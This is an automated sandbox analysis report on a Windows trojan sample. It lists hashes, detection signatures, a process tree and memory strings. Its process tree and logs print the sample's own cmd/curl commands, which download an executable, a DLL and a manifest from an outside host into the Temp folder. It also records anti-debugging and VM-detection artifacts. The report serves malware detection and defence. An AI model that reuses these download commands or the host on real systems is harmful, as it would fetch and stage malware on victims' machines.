Windows Analysis Report j82lgS5kgk

Overview

General Information

Sample Name: j82lgS5kgk (renamed file extension from none to exe)
Analysis ID: 553495
MD5: ae6cdc2be9207880528e784fc54501ed
SHA1: b4aff64bb1f0fee5d5c47c5f1275351c758b423a
SHA256: e71a997a58a54db0a879969fa1c3de5193b090bc59f3468f408785dbc0d9c7ac
Tags: 32 exe trojan
Detection

Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
One or more processes crash
Checks if the current process is being debugged
Queries the installation date of Windows
Binary contains a suspicious time stamp
Sample execution stops while process was sleeping (likely an evasion)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • j82lgS5kgk.exe (PID: 7104 cmdline: "C:\Users\user\Desktop\j82lgS5kgk.exe" MD5: AE6CDC2BE9207880528E784FC54501ED)
    • cmd.exe (PID: 7132 cmdline: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • curl.exe (PID: 4544 cmdline: curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
    • cmd.exe (PID: 4700 cmdline: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • curl.exe (PID: 6508 cmdline: curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
    • cmd.exe (PID: 1380 cmdline: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • curl.exe (PID: 6092 cmdline: curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe" MD5: BDEBD2FC4927DA00EEA263AF9CF8F7ED)
    • dw20.exe (PID: 5272 cmdline: dw20.exe -x -s 824 MD5: 9B2D2AE232F2D0EFAEF9D5EB2509BE79)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Source: Process started | Author: James Pemberton / @4A616D6573 | Data: Command: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest, CommandLine: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\j82lgS5kgk.exe" , ParentImage: C:\Users\user\Desktop\j82lgS5kgk.exe, ParentProcessId: 7104, ProcessCommandLine: cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest, ProcessId: 7132

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: j82lgS5kgk.exe | Virustotal: Detection: 13%
Source: j82lgS5kgk.exe | ReversingLabs: Detection: 16%
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
Source: j82lgS5kgk.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: \??\C:\Users\user\Desktop\j82lgS5kgk.PDB source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\symbols\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbj3 source: j82lgS5kgk.exe
Source: Binary string: Fo9.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdb source: j82lgS5kgk.exe
Source: Binary string: C:\Users\user\Desktop\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbBB source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\WindowsFormsApp9.pdb\Pro source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\exe\WindowsFormsApp9.pdbe1 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb813 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: ws\WindowsFormsApp9.pdbpdbpp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbSystem source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
Source: dw20.exe, 00000010.00000003.681799621.00000000005F6000.00000004.00000001.sdmp, dw20.exe, 00000010.00000002.684227164.00000000005F6000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Amcache.hve.16.dr | String found in binary or memory: http://upx.sf.net
Source: curl.exe, 00000009.00000002.660572235.0000024B80CC0000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dll
Source: cmd.exe, 00000007.00000002.661556157.000001DCDAA60000.00000004.00000040.sdmp, curl.exe, 00000009.00000002.660572235.0000024B80CC0000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dll-oC:
Source: curl.exe, 00000009.00000002.660576883.0000024B80CC7000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dll3
Source: j82lgS5kgk.exe | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dllWhttps://sincheats.com/gas/PS4SAVEWIZARD.exe
Source: curl.exe, 00000009.00000002.660576883.0000024B80CC7000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.dllurlrc
Source: curl.exe, 0000000F.00000002.670558231.00000173F3432000.00000004.00000001.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe
Source: cmd.exe, 0000000C.00000002.671799816.000001A5F02C0000.00000004.00000040.sdmp, curl.exe, 0000000F.00000002.670533583.00000173F3420000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe-oC:
Source: curl.exe, 00000005.00000002.655444485.0000019DEBA60000.00000004.00000020.sdmp, curl.exe, 00000005.00000002.655463286.0000019DEBA72000.00000004.00000001.sdmp, curl.exe, 00000005.00000003.655221999.0000019DEBA70000.00000004.00000001.sdmp, j82lgS5kgk.exe | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest
Source: cmd.exe, 00000001.00000002.656320836.00000254AB400000.00000004.00000040.sdmp, curl.exe, 00000005.00000002.655444485.0000019DEBA60000.00000004.00000020.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest-oC:
Source: curl.exe, 0000000F.00000003.670298105.00000173F342F000.00000004.00000001.sdmp, curl.exe, 0000000F.00000002.670558231.00000173F3432000.00000004.00000001.sdmp | String found in binary or memory: https://sincheats.com/gas/PS4SAVEWIZARD.exeKH
Source: unknown | DNS traffic detected: queries for: sincheats.com
Source: j82lgS5kgk.exe | Binary or memory string: OriginalFilename vs j82lgS5kgk.exe
Source: j82lgS5kgk.exe, 00000000.00000002.683951517.00000000001F2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameWindowsFormsApp9.exeB vs j82lgS5kgk.exe
Source: j82lgS5kgk.exe, 00000000.00000002.684043836.00000000005EB000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamemscorwks.dllT vs j82lgS5kgk.exe
Source: j82lgS5kgk.exe | Binary or memory string: OriginalFilenameWindowsFormsApp9.exeB vs j82lgS5kgk.exe
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824
Source: j82lgS5kgk.exe | Virustotal: Detection: 13%
Source: j82lgS5kgk.exe | ReversingLabs: Detection: 16%
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | File read: C:\Users\user\Desktop\j82lgS5kgk.exe
Source: j82lgS5kgk.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\077cf2bd55145d691314f0889d7a1997\mscorlib.ni.dll
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: unknown | Process created: C:\Users\user\Desktop\j82lgS5kgk.exe "C:\Users\user\Desktop\j82lgS5kgk.exe"
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest"
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll"
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe"
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe"
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5516:120:WilError_01
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF404.tmp
Source: classification engine | Classification label: mal48.winEXE@18/7@3/1
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\curl.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: j82lgS5kgk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
Source: j82lgS5kgk.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: j82lgS5kgk.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Users\user\Desktop\j82lgS5kgk.PDB source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\symbols\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbj3 source: j82lgS5kgk.exe
Source: Binary string: Fo9.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdb source: j82lgS5kgk.exe
Source: Binary string: C:\Users\user\Desktop\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbBB source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\WindowsFormsApp9.pdb\Pro source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\exe\WindowsFormsApp9.pdbe1 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: \??\C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb813 source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: C:\Windows\exe\WindowsFormsApp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: j82lgS5kgk.exe, 00000000.00000002.684107001.000000000061A000.00000004.00000020.sdmp
Source: Binary string: ws\WindowsFormsApp9.pdbpdbpp9.pdb source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: Binary string: C:\Users\duboki\source\repos\WindowsFormsApp9\WindowsFormsApp9\obj\Debug\WindowsFormsApp9.pdbSystem source: j82lgS5kgk.exe, 00000000.00000002.686266390.0000000002503000.00000004.00000040.sdmp
Source: j82lgS5kgk.exe | Static PE information: 0xDDC5B4B8 [Wed Nov 26 21:46:32 2087 UTC]
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: Amcache.hve.16.dr | Binary or memory string: VMware
Source: Amcache.hve.16.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.16.dr | Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.16.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.16.dr | Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
Source: Amcache.hve.16.dr | Binary or memory string: VMware, Inc.
Source: dw20.exe, 00000010.00000002.684129056.0000000000581000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWp
Source: Amcache.hve.16.dr | Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.16.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.16.dr | Binary or memory string: VMware7,1
Source: Amcache.hve.16.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.16.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.16.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: dw20.exe, 00000010.00000002.684213809.00000000005E7000.00000004.00000020.sdmp, dw20.exe, 00000010.00000003.681586303.00000000005E7000.00000004.00000001.sdmp, dw20.exe, 00000010.00000003.681998985.00000000005E7000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: Amcache.hve.16.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.16.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.16.dr | Binary or memory string: VMware, Inc.me
Source: Amcache.hve.16.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: curl.exe, 00000005.00000002.655463286.0000019DEBA72000.00000004.00000001.sdmp, curl.exe, 00000005.00000003.655221999.0000019DEBA70000.00000004.00000001.sdmp, curl.exe, 00000009.00000002.660576883.0000024B80CC7000.00000004.00000020.sdmp, curl.exe, 0000000F.00000003.670298105.00000173F342F000.00000004.00000001.sdmp, curl.exe, 0000000F.00000002.670558231.00000173F3432000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.16.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\System32\cmd.exe cmd" /C curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe
Source: C:\Users\user\Desktop\j82lgS5kgk.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe dw20.exe -x -s 824
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe.manifest -o "C:\Users\user\AppData\Local\Temp\flexteam.exe.manifest"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.dll -o "C:\Users\user\AppData\Local\Temp\flexteam.dll"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\curl.exe curl -L https://sincheats.com/gas/PS4SAVEWIZARD.exe -o "C:\Users\user\AppData\Local\Temp\flexteam.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.16.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe

Mitre Att&ck Matrix

